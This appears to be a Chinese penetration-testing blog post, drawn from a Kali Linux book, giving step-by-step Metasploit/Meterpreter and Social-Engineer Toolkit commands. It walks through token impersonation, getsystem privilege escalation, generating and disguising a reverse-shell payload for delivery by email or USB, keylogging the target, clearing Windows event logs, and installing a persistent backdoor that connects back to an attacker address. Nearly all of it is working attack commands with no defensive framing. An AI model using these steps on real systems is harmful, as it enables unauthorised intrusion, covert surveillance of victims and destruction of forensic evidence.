权限提升(SET)

1、使用假冒令牌
1)、启动meterpreter会话,执行命令
sessions -i 1
2)、use incognito加载incognito模块,然后列举出令牌
3)、help查看帮助信息,了解列举令牌的命令
4)、list_tokens -u 列举出所有的令牌
5)、impersonate_token命令假冒用户进行攻击
impersonate_token user
2、本地权限提升
1)、启动meterpreter会话
sessions -i 1
2)、使用getsystem命令提升本地权限、
getsystem -h 查看该命令的帮助嘻嘻
3)、执行命令 getsystem提升权限(自动选择方法1)
4)add_user bob 1231 -h ip #创建用户
3、使用社会工程学工具包
1)、setoolkit 启动SET
在这里插入图片描述
2)、选择社会工程学,将显示如下信息
在这里插入图片描述
3)、创建一个攻击载荷和监听器,即输入编号4
在这里插入图片描述
输出信息显示了可生成的所有攻击载荷,根据目标系统选择相应的攻击载荷
4)、假设攻击的目标系统win,选择编号2
5)、将该过程与指定的ip和端口绑定,将打开一个handler,并生成payload,将ip地址与端口绑定,是因为主机上可能存在多个网卡,但是端口号是不可变的,这样监听器将等待被渗透攻击的系统来连接,并且负责这些网络连接
在这里插入图片描述
在这里插入图片描述

4、传递攻击载荷给目标系统
payload:是指用户系统目标系统在被渗透攻击之后执行的代码
例如:反弹shell是一种从目标系统到攻击主机创建的网络连接,并提供命令行shell的攻击载荷
Bind Shell攻击载荷则在目标系统上将命令行shell绑定到一个打开的监听端口,攻击者可以连接这些端口取得shell交互
1)、社会工程学工具的攻击载荷默认在/root/.set/payload.exe,将其发送到目标主机(邮件发送或者存储在U盘)
在这里插入图片描述
2)、mv payload.exe xx 修改文件名
3)、zip xxx payload.exe用zip命令压缩该文件
4)、当目标系统打开内容后,将在msf handler下建立一个活跃的会话
5、收集目标系统数据
1)激活meterpreter会话
sessions -i 1
2)开启键盘记录器
keyscan_start
3)收集目标系统中的数据
keyscan_dump
6、清除踪迹
1)激活meterpreter会话
sessions -i 1
2)irb 命令清除踪迹
输出信息中看到>>提示符,表示成功运行了irb命令
3)设置想要删除的日志,常用日志选项如下

  log=client.sys.eventlog.open('system');
  log=client.sys.eventlog.open('security');
  log=client.sys.eventlog.open('application');
  log=client.sys.eventlog.open('directory service');
  log=client.sys.eventlog.open('dns server');
  log=client.sys.eventlog.open('file replication service');

上述命令指定了要清除的日志,最后,log.clear清除日志文件
7、创建持久后门
1)激活meterpreter会话
sessions -i 1
2)查看帮助文档
run persistence -h
3)创建一个持久后门
run persistence -U -A -i 10 - 8090 -r $IP #将在目标系统中创建一个持久脚本,并且脚本将在目标主机上自动运行

参考书籍:Kali Linux渗透测试技术详解

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值